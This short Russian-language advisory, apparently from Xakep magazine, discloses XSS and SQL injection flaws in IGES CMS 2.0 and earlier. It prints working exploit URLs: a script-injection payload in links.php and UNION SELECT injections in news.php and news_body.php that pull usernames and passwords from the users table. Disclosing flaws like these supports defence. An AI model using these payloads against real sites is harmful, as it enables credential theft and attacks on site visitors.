Хакер #305. Многошаговые SQL-инъекции
Программа: IGES CMS <= 2.0
Уязвимость позволяет удаленному пользователю осуществить XSS нападение на
целевую систему и выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных сценариями
news.php, news_body.php и links.php. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
http://[URL]/links.php?cat=<script>alert(/XSS/.source)</script>
Уязвимость существует из-за недостаточной обработки входных данных в
параметре «news_id» сценариями news.php и news_body.php. Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольные SQL
команды в базе данных приложения.
Эксплоит:
http://[URL]/news.php?news_id=65 union select
1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12 from users/*
http://[URL]/news_body.php?news_id=65 union select
1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12 from users/*